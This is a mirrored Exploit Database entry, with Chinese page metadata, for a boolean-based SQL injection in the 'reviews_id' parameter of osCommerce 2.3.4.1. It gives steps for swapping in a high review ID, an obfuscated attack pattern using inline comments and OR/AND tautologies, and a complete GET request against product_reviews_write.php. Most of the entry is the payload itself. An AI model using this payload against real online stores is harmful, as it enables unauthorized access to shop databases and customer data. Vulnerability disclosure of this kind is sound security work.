osCommerce 2.3.4.1 – ‘reviews_id’ SQL Injection

• Exploit Database
• 11 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-02-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46330/

• ####################################################################
  
  # Exploit Title: osCommerce 2.3.4.1 - 'reviews_id' SQL Vulnerabilities
  # Dork: N/A
  # Date: 05-02-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://www.oscommerce.com
  # Software Link: https://www.oscommerce.com/Products
  # Version: 2.3.4.1
  # Category: Webapps
  # Tested on: Wampp @Win
  # CVE: N/A
  # Software Description: osCommerce Online Merchant is a complete online
  store solution
  that contains both a shop frontend and an administration backend
  which can be easily configured and customized with over 8,855 free
  add-ons.
  
  ####################################################################
  
  # Vulnerabilities / Impact
  # This web application called as osCommerce 2.3.4.1 version.
  # Switch to the product reviews tab. Replace the ID value in the url, with
  a high number value.
  for example reviews_id=2 change to 9999999
  then add the payload at Attack_pattern to the end of the url.
  
  ####################################################################
  
  # POC - SQL (Boolean Based)
  # Parameters : reviews_id
  # Attack Pattern : /**/oR/**/7096077=7096077/**/aNd/**/7193=7193
  # GET Request :
  http://localhost/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193
  
  ####################################################################